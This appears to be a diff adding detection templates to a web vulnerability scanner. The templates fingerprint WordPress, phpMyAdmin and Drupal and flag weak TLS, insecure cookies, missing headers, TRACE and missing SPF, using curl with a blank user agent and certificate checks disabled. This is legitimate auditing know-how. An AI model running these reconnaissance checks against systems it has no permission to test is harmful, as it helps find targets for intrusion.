@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Wordpress Detected 1'
|
||||
URI='/'
|
||||
METHOD='GET'
|
||||
MATCH="content\=\"WordPress\ "
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Wordpress Detected 2'
|
||||
URI='/blog/'
|
||||
METHOD='GET'
|
||||
MATCH="content\=\"WordPress\ "
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Wordpress Detected 3'
|
||||
URI='/wordpress/'
|
||||
METHOD='GET'
|
||||
MATCH="content\=\"WordPress\ "
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='phpMyAdmin Detected'
|
||||
URI='/phpmyadmin/'
|
||||
METHOD='GET'
|
||||
MATCH='<title>phpMyAdmin '
|
||||
SEVERITY='P5 - INFO'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
|
|
@ -0,0 +1,8 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Autocomplete Enabled'
|
||||
FILENAME="$LOOT_DIR/web/websource-$TARGET-*.txt"
|
||||
MATCH='autocomplete=\"on\"'
|
||||
SEVERITY='P4 - LOW'
|
||||
GREP_OPTIONS='-i'
|
||||
SEARCH='positive'
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
@ -0,0 +1,8 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CORS Policy - Allow-Credentials Enabled'
|
||||
FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt"
|
||||
MATCH='Access-Control-Allow-Credentials: true'
|
||||
SEVERITY='P4 - LOW'
|
||||
GREP_OPTIONS='-i'
|
||||
SEARCH='positive'
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
@ -0,0 +1,8 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Clear-Text Protocol - HTTP'
|
||||
FILENAME="$LOOT_DIR/web/headers-http-$TARGET.txt"
|
||||
MATCH='200 OK'
|
||||
SEVERITY='P2 - HIGH'
|
||||
GREP_OPTIONS='-i'
|
||||
SEARCH='positive'
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
@ -0,0 +1,8 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Clickjacking'
|
||||
FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt"
|
||||
MATCH='X-Frame-Options'
|
||||
SEVERITY='P4 - LOW'
|
||||
GREP_OPTIONS='-i'
|
||||
SEARCH="negative"
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
@ -0,0 +1,8 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Drupal Detected'
|
||||
FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt"
|
||||
MATCH='X-Generator: Drupal '
|
||||
SEVERITY='P5 - INFO'
|
||||
GREP_OPTIONS='-i'
|
||||
SEARCH='positive'
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
@ -0,0 +1,8 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Expired SSL Certificate'
|
||||
FILENAME="$LOOT_DIR/web/curldebug-$TARGET.txt"
|
||||
MATCH='certificate has expired'
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
GREP_OPTIONS=''
|
||||
SEARCH='positive'
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
@ -0,0 +1,8 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Insecure Cookie - HTTPOnly Not Set'
|
||||
FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt"
|
||||
MATCH='Set-Cookie'
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
GREP_OPTIONS='-i'
|
||||
SEARCH='positive'
|
||||
SECONDARY_COMMANDS=' | egrep -iv httponly'
|
||||
|
|
@ -0,0 +1,8 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Insecure Cookie - Secure Not Set'
|
||||
FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt"
|
||||
MATCH='Set-Cookie'
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
GREP_OPTIONS='-i'
|
||||
SEARCH='positive'
|
||||
SECONDARY_COMMANDS=' | egrep -iv secure'
|
||||
|
|
@ -0,0 +1,8 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Weak SSL TLS Protocols'
|
||||
FILENAME="$LOOT_DIR/web/sslscan-$TARGET.txt"
|
||||
MATCH=' SSLv'
|
||||
SEVERITY='P2 - HIGH'
|
||||
GREP_OPTIONS='-i'
|
||||
SEARCH='positive'
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
@ -0,0 +1,8 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Insecure SSL TLS Connection CN Mismatch'
|
||||
FILENAME="$LOOT_DIR/web/curldebug-$TARGET.txt"
|
||||
MATCH='failed to verify the legitimacy of the server'
|
||||
SEVERITY='P3 - MEDIUM'
|
||||
GREP_OPTIONS='-i'
|
||||
SEARCH='positive'
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
@ -0,0 +1,8 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='Lack of SPF DNS Record'
|
||||
FILENAME="$LOOT_DIR/nmap/email-$TARGET-*.txt"
|
||||
MATCH='\[\+\] Spoofing possible'
|
||||
SEVERITY='P4 - LOW'
|
||||
GREP_OPTIONS='-i'
|
||||
SEARCH='positive'
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
@ -0,0 +1,8 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='TRACE Method Enabled'
|
||||
FILENAME="$LOOT_DIR/web/http_options-$TARGET-*.txt"
|
||||
MATCH='TRACE'
|
||||
SEVERITY='P4 - LOW'
|
||||
GREP_OPTIONS='-i'
|
||||
SEARCH='positive'
|
||||
SECONDARY_COMMANDS=''
|
||||
|
|
@ -0,0 +1,8 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='X-Powered-By Header Found'
|
||||
FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt"
|
||||
MATCH='X-Powered-By'
|
||||
SEVERITY='P5 - INFO'
|
||||
GREP_OPTIONS='-i'
|
||||
SEARCH='positive'
|
||||
SECONDARY_COMMANDS=''
|
||||
Loading…
Reference in New Issue